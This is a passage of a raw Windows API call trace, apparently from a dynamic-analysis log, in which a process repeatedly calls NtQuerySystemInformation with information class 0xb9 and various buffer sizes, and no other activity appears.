Length=0x0, ResultLength=0x0) [0217.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0217.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0217.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0217.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0217.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0217.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0217.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0217.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0217.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0217.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0217.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0217.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0217.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0217.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0217.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0217.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0217.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0217.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0217.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0217.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0217.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd540, Length=0x28, ResultLength=0x0) [0217.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0217.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0217.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0217.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0217.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0217.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0217.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0217.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0217.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0217.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x20, ResultLength=0x0) [0217.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0217.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0217.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0217.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0217.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0217.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0217.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0217.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0217.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0217.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0217.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0217.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0217.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0217.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0217.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd540, Length=0x28, ResultLength=0x0) [0217.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0217.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0217.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0217.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0217.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0217.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x20, ResultLength=0x0) [0217.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0217.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0217.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0217.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0217.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0217.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0217.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0217.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0217.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0217.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0217.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0217.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0217.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0217.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0217.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0217.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0217.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0217.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0217.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0217.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x20, ResultLength=0x0) [0217.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0217.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0217.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0217.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x38, ResultLength=0x0) [0217.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x20, ResultLength=0x0) [0217.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0217.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0217.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x50, ResultLength=0x0) [0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x50, ResultLength=0x0) [0217.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 